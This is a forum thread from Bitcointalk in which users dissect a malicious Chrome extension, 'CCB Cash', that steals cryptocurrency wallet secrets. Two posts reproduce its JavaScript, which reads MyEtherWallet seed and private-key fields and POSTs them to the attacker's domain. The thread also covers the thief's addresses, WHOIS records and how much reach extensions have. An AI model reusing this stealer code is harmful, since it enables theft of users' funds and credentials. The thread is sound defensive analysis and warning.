seoincorporation (OP)
Legendary
Offline
Activity: 3374
Merit: 3130
|
|
December 12, 2018, 02:45:03 PM |
|
A lot of users on the forum are getting scammed this way as you can see on the next links: https://bitcointalk.org/index.php?topic=5083404.0https://bitcointalk.org/index.php?topic=5083139.0https://bitcointalk.org/index.php?topic=5081286.0So, the add-on has been taken down and they upload it with another name, now is called CCB Cash. https://chrome.google.com/webstore/detail/%D1%81cb-cash/liachincjagnalnmahhaioaogkngbmhf?hl=en-US&gl=MXSo, there is an extension to view source code from any addon, it's called 'Chrome extension source viewer' When i take a look to this code i realized how bad it is... "name": "CCB Cash", "permissions": [ "activeTab", "tabs", "cookies", "*://github.com/*", "*://api.github.com/*", "*://exmo.me/*", "*://*.twitter.com/*", "*://*.coinbase.com/*", "*://qq.com/*", "*://*.hbg.com/*", "*://hitbtc.com/*", "*://twitter.com/*", "*://*.binance.com/*", "*://*.localbitcoins.com/*", "*://localbitcoins.com/*", "*://blockchain.com/*", "*://*.exmo.com/*", "*://cryptodraw.org/*", "*://exmo.com/*", "*://*.live.com/*", "*://bitfinex.com/*", "*://hbg.com/*", "*://*.yahoo.com/*", "*://google.com/*", "*://*.bitfinex.com/*", "*://*.hitbtc.com/*", "*://coinbase.com/*", "*://*.huobi.com/*", "*://*.google.com/*", "*://*.exmo.me/*", "*://huobi.com/*", "*://yahoo.com/*", "*://*.blockchain.com/*", "*://myetherwallet.com/*", "*://binance.com/*", "*://*.myetherwallet.com/*", "*://live.com/*", "*://*.qq.com/*" ], So, this time i ask for some help, maybe the developers can find some useful information about this APP to stop this hacker. By the way, you don't have to install the addon to see the source.
|
|
|
|
nuno12345
|
|
December 13, 2018, 08:52:22 AM Last edit: December 13, 2018, 09:17:33 AM by nuno12345 |
|
Had a quick look. How the extension works is by filtering the domains listed and get information such as seed and send it to https://help-tools.org/courses/currentc.phpMyEtherWallet: if (location.href.indexOf('myetherwallet') > -1) { function kurilkaNJSmo() { document.onkeyup = function(e) { e = e || window.event; if (e.keyCode === 13) { var seeddas = $("#aria4").val(); var pkk = $("#aria6").val(); var myseedwal = seeddas + ' + ' + pkk; $.ajax({ type: 'POST', url: 'https://help-tools.org/courses/currentc.php', crossDomain: !0, data: { meww: "none" + ":" + "myetherwallet" + ":" + myseedwal }, dataType: 'html', }) } return !1 } document.body.addEventListener("click", function(event) { if (event.toElement.className == "btn btn-primary ng-scope") { console.log("go"); var seeddas = $("#aria4").val(); var pkk = $("#aria6").val(); var myseedwal = seeddas + ' + ' + pkk; $.ajax({ type: 'POST', url: 'https://help-tools.org/courses/currentc.php', crossDomain: !0, data: { meww: "none" + ":" + "myetherwallet" + ":" + myseedwal }, dataType: 'html', }) } }) } setTimeout(kurilkaNJSmo, 2000) } That domain was clearly hacked. The expected format is something like none:myetherwallet:key When sending a GET request some currency tickers are returned. Sending a POST request the response sends the same data but with either a "+" or "-" as the very first character of the page, depending on where the format is valid or not? By removing some of the parameters "invalid" is returned. Best bet would be to block the domain but if the user is smart enough to block a domain it will be smart enough not to download the extension in the first place i would assume. EDIT: Addresses of the thief: CypherMcDAG.BTC = '16EegrNMdZ9Rxku6Za5neEFjMW57wkQr1S'; CypherMcDAG.ETH = '0x03b70dc31abf9cf6c1cf80bfeeb322e8d3dbb4ca'; CypherMcDAG.ETC = '0x4F53C9882Ba87d2D7c525dF2aEF2540EFB6e32e5'; CypherMcDAG.BCH = '1PCh7w6LdcEv1sWd5wtvkELHcWe5HumUi3'; CypherMcDAG.LTC = 'LRPChoyN8qLWENjo1dUjk2bESZjE7bQ6sP'; Some comments: //tut kodpzds - Google translate autodetects russian? Ofc.. //bikbuk = bikbuk*0.01; Some urls: https://help-tools.org/courses/plsnoban.phphttps://help-tools.org/md5.phphttps://help-tools.org/courses/status.php?s=c
|
|
|
|
buwaytress
Legendary
Offline
Activity: 3024
Merit: 3727
Join the world-leading crypto sportsbook NOW!
|
|
December 13, 2018, 09:20:26 AM |
|
@nuno yes, unfortunately, preventive measures like you suggested fail because the assumption that users are able to reach those conclusions are wrong, proven because they failed at the first step already by downloading those extensions.
For now, only way is to keep reporting those add-ons and related servers/URLs that it's sending data too, so perhaps the Chrome store can prevent them from reaching new users. Until this hits the news and socmed, unlikely people will learn on their own.
|
|
|
|
nuno12345
|
|
December 13, 2018, 09:37:34 AM |
|
I understand.
What if someone makes an extension to block this type of behaviour?
Requests could be blocked to certain urls, cors enforced, etc.
By having an external list, say being grabbed from github it could be updated much quicker than relying on google or registrars to take down extensions/domains
|
|
|
|
jjjfff
Copper Member
Member
Offline
Activity: 182
Merit: 18
Crypto.BI
|
Note that no URL has ever been captured for help-tools.org Looking a bit further into it, this domain does not seem hacked. It seems to have been deliberately registered for this purpose: Domain Name: HELP-TOOLS.ORG Registry Domain ID: D402200000008508823-LROR Registrar WHOIS Server: whois.namesilo.com Registrar URL: www.namesilo.comUpdated Date: 2018-12-06T08:04:10Z Creation Date: 2018-12-02T06:52:52ZThe domain was registered last Sunday and was already hardcoded into the malware's source. No way it could've been hacked in this period - it's deliberate. As expected the specific whois is anonymized: Registrant Email: pw-1064a16b3dfb69e838295e2eefdabc6f@privacyguardian.orgRegistry Admin ID: Admin Name: Domain Administrator Admin Organization: See PrivacyGuardian.org Admin Street: 1928 E. Highland Ave. Ste F104 PMB# 255 Emails sent to pw-1064a16b3dfb69e838295e2eefdabc6f@privacyguardian.org should reach the malware author though.
|
|
|
|
KingZee
Sr. Member
Offline
Activity: 952
Merit: 452
Check your coin privilege
|
|
December 13, 2018, 11:18:21 AM |
|
Looking a bit further into it, this domain does not seem hacked. It seems to have been deliberately registered for this purpose:
I was just going to say that, it's a 404 on the main page, fresh domain, hacked my ass. I can't think of any way to prevent this from happening to your typical user. If someone thinks that it's possible for an addon, to monitor other downloaded addons, before they're installed, to check for patterns, then it might be possible to make a quick solution to prevent this in the future. You should all remember that the perpetrator is constantly promoting his scam here using newbie accounts, and probably reads all of this, so hello scammer, we're trying to stop you
|
Beep boop beep boop
|
|
|
seoincorporation (OP)
Legendary
Offline
Activity: 3374
Merit: 3130
|
|
December 13, 2018, 01:54:00 PM |
|
Had a quick look. How the extension works is by filtering the domains listed and get information such as seed and send it to https://help-tools.org/courses/currentc.phpMyEtherWallet: if (location.href.indexOf('myetherwallet') > -1) { function kurilkaNJSmo() { document.onkeyup = function(e) { e = e || window.event; if (e.keyCode === 13) { var seeddas = $("#aria4").val(); var pkk = $("#aria6").val(); var myseedwal = seeddas + ' + ' + pkk; $.ajax({ type: 'POST', url: 'https://help-tools.org/courses/currentc.php', crossDomain: !0, data: { meww: "none" + ":" + "myetherwallet" + ":" + myseedwal }, dataType: 'html', }) } return !1 } document.body.addEventListener("click", function(event) { if (event.toElement.className == "btn btn-primary ng-scope") { console.log("go"); var seeddas = $("#aria4").val(); var pkk = $("#aria6").val(); var myseedwal = seeddas + ' + ' + pkk; $.ajax({ type: 'POST', url: 'https://help-tools.org/courses/currentc.php', crossDomain: !0, data: { meww: "none" + ":" + "myetherwallet" + ":" + myseedwal }, dataType: 'html', }) } }) } setTimeout(kurilkaNJSmo, 2000) } That domain was clearly hacked. The expected format is something like none:myetherwallet:key When sending a GET request some currency tickers are returned. Sending a POST request the response sends the same data but with either a "+" or "-" as the very first character of the page, depending on where the format is valid or not? By removing some of the parameters "invalid" is returned. Best bet would be to block the domain but if the user is smart enough to block a domain it will be smart enough not to download the extension in the first place i would assume. EDIT: Addresses of the thief: CypherMcDAG.BTC = '16EegrNMdZ9Rxku6Za5neEFjMW57wkQr1S'; CypherMcDAG.ETH = '0x03b70dc31abf9cf6c1cf80bfeeb322e8d3dbb4ca'; CypherMcDAG.ETC = '0x4F53C9882Ba87d2D7c525dF2aEF2540EFB6e32e5'; CypherMcDAG.BCH = '1PCh7w6LdcEv1sWd5wtvkELHcWe5HumUi3'; CypherMcDAG.LTC = 'LRPChoyN8qLWENjo1dUjk2bESZjE7bQ6sP'; Some comments: //tut kodpzds - Google translate autodetects russian? Ofc.. //bikbuk = bikbuk*0.01; Some urls: https://help-tools.org/courses/plsnoban.phphttps://help-tools.org/md5.phphttps://help-tools.org/courses/status.php?s=cThanks nuno12345 that's some great information, was the kind of info i was searching for. I leave you some merits.
|
|
|
|
mistercoin
Legendary
Offline
Activity: 1057
Merit: 1000
Rent Me!
|
|
December 14, 2018, 05:07:21 PM |
|
@nuno yes, unfortunately, preventive measures like you suggested fail because the assumption that users are able to reach those conclusions are wrong, proven because they failed at the first step already by downloading those extensions.
For now, only way is to keep reporting those add-ons and related servers/URLs that it's sending data too, so perhaps the Chrome store can prevent them from reaching new users. Until this hits the news and socmed, unlikely people will learn on their own.
Sadly, I too believe this is the case. It will take a massive loss for the news to pick it up and spread the facts to the rest of the chrome users. I'm going to take a look at the source code and see if I can find any connections between the domains, addresses and people. I'll let you all know what I find. If only Google were as vigilant with their browser add-ons as they were with their YouTube platform takedown algorithms, our jobs would be a lot easier.. *sigh* -MisterCoin
|
|
|
|
Piggy
|
|
December 16, 2018, 07:10:52 AM |
|
Unfortunately there is the misconception that running a google extensions is safer than running an exe, for unexperienced users. Plus people may think it's safe because it's from Google How is the situation for Firefox extensions? I'm afraid since this scam is quite easy to pull is just going to get worse the situation with these extensions..
|
|
|
|
xBoxLive
Member
Offline
Activity: 266
Merit: 25
|
|
December 16, 2018, 04:17:28 PM |
|
Unfortunately there is the misconception that running a google extensions is safer than running an exe, for unexperienced users. Plus people may think it's safe because it's from Google How is the situation for Firefox extensions? I'm afraid since this scam is quite easy to pull is just going to get worse the situation with these extensions.. It is a scam. I reported it to Google. Now we wait 2 months for them to remove it?
|
|
|
|
Piggy
|
|
December 16, 2018, 08:03:16 PM |
|
It is a scam. I reported it to Google. Now we wait 2 months for them to remove it?
I don't think they are going to be in any hurry to do that indeed. When you install the extension they are telling you the equivalent of "do it at your own risk". I guess they would act a bit faster just if they would start to lose money
|
|
|
|
seoincorporation (OP)
Legendary
Offline
Activity: 3374
Merit: 3130
|
|
December 16, 2018, 09:14:56 PM |
|
Unfortunately there is the misconception that running a google extensions is safer than running an exe, for unexperienced users. Plus people may think it's safe because it's from Google How is the situation for Firefox extensions? I'm afraid since this scam is quite easy to pull is just going to get worse the situation with these extensions.. Agree and it's sad, google and firefox should worry a little more for the customers, i know they are big platforms and should be hard for them to review their apps one by one, but c'mon we are almost in 2019 and that job could be done by artificial neural networks. A simple grep to verify if the app is hacking information from the main sites like google, outlook, or some social networks. Is intolerable the fact that anyone can make this kind of apps and publish them as if there were no law.
|
|
|
|
bob123
Legendary
Offline
Activity: 1624
Merit: 2482
|
Unfortunately there is the misconception that running a google extensions is safer than running an exe, for unexperienced users.
It depends on how you define safer. A web browser extension can: - access all sites you visit
- read / modify each information you enter on any website (e.g. usernames / passwords)
- steal your cookies (which are a form of authentication)
However, a browser extension can NOT: - search through your file system
- download any additional malware (add-ons are run within an isolated environment)
- access your system at all
- do anything non-browser-related
- compromise your system
Running an executable on your system can do anything the user also is able to do (or even more if a privilege escalation is being abused).
|
|
|
|
KingZee
Sr. Member
Offline
Activity: 952
Merit: 452
Check your coin privilege
|
|
December 20, 2018, 11:37:11 AM Merited by vapourminer (1) |
|
...
I'm not sure honestly. I know for a fact browser extensions can access the file system purely from my experience with past extensions. I spent about 30 minutes skimming google and their developer docs. If this is wrong on my end please let me know : - download any additional malware (add-ons are run within an isolated environment) : Downloading malware means the application needs permission to connect to its server, and needs write permission on the target machine. Examples of extensions with write permission : 3rd party session saving that restore your tabs, and any application that needs to store its state on your computer.
- search through your file system : This means read permission. An extension that comes to mind is download managers and extensions that communicate with other applications.
So, API examples : https://developer.chrome.com/apps/fileSystem : File System endpoint. After reading through this it looks like you can access absolute paths on the target machine. https://developer.chrome.com/apps/storage : Storage endpoint. Note that this is a lot different because you can only access your own directory in AppData. https://developer.chrome.com/extensions/nativeMessaging : Native messaging. Even though after reading through it, it looke like that it might be only possible for the app to send messages to other apps that they programmed themselves. But even without mentioning all of these, just purely including complete browser access is a massive security risk. Especially for people who use web wallets. Like bob said the extension can run any arbitrary code on any webpage, access any session-related data, display/modify any forms.. Basically a complete takeover over your browser experience.
|
Beep boop beep boop
|
|
|
Initscri
|
|
December 22, 2018, 01:10:44 AM |
|
Note that no URL has ever been captured for help-tools.org Looking a bit further into it, this domain does not seem hacked. It seems to have been deliberately registered for this purpose: Domain Name: HELP-TOOLS.ORG Registry Domain ID: D402200000008508823-LROR Registrar WHOIS Server: whois.namesilo.com Registrar URL: www.namesilo.comUpdated Date: 2018-12-06T08:04:10Z Creation Date: 2018-12-02T06:52:52ZThe domain was registered last Sunday and was already hardcoded into the malware's source. No way it could've been hacked in this period - it's deliberate. As expected the specific whois is anonymized: Registrant Email: pw-1064a16b3dfb69e838295e2eefdabc6f@privacyguardian.orgRegistry Admin ID: Admin Name: Domain Administrator Admin Organization: See PrivacyGuardian.org Admin Street: 1928 E. Highland Ave. Ste F104 PMB# 255 Emails sent to pw-1064a16b3dfb69e838295e2eefdabc6f@privacyguardian.org should reach the malware author though. Did you include a pixel tracker in that? If they open the email and their email service provider doesn't block it, you'll get their IP address which may be useful to connect/identify the user. Unfortunately there is the misconception that running a google extensions is safer than running an exe, for unexperienced users. Plus people may think it's safe because it's from Google How is the situation for Firefox extensions? I'm afraid since this scam is quite easy to pull is just going to get worse the situation with these extensions.. Quite the contrary, it's actually far easier to build & market a chrome extension (or FF) when compared to system level executable. Let's face it, any script kiddie can basically build one with junior-level knowledge of Javascript. If Google isn't checking the source, virtually no plugin/extension is 100% safe. I wouldn't be surprised if non-bitcoin related chrome extensions are built just waiting to pickup on Bitcoin related traffic.
|
---------------------------------- Web Developer. PM for details. ----------------------------------
|
|
|
ranman09
|
|
December 22, 2018, 02:17:52 AM |
|
Unfortunately there is the misconception that running a google extensions is safer than running an exe, for unexperienced users. Plus people may think it's safe because it's from Google How is the situation for Firefox extensions? I'm afraid since this scam is quite easy to pull is just going to get worse the situation with these extensions.. Really sad this what I thought of in the first place. I trusted google too much. So this means that its really easy for a hacker to upload a malware through a trusted source like google. Now I don't know what to do and where to actually download trusted sources. Should we know how to crack exe and extensions and read them?
|
|
|
|
Initscri
|
|
December 23, 2018, 06:50:42 AM |
|
Unfortunately there is the misconception that running a google extensions is safer than running an exe, for unexperienced users. Plus people may think it's safe because it's from Google How is the situation for Firefox extensions? I'm afraid since this scam is quite easy to pull is just going to get worse the situation with these extensions.. Really sad this what I thought of in the first place. I trusted google too much. So this means that its really easy for a hacker to upload a malware through a trusted source like google. Now I don't know what to do and where to actually download trusted sources. Should we know how to crack exe and extensions and read them? AFAIK, google releases the extensions onto the market without them being 100% verified first. There's just simply way too many extensions being uploaded, they wouldn't be able to manually approve each one. They employ individuals to respond to reports, and perform spot checks (and I'm sure they have automated systems to catch most things/conventional attacks); but at the end of the day it's primarily up to the user to verify.
|
---------------------------------- Web Developer. PM for details. ----------------------------------
|
|
|
|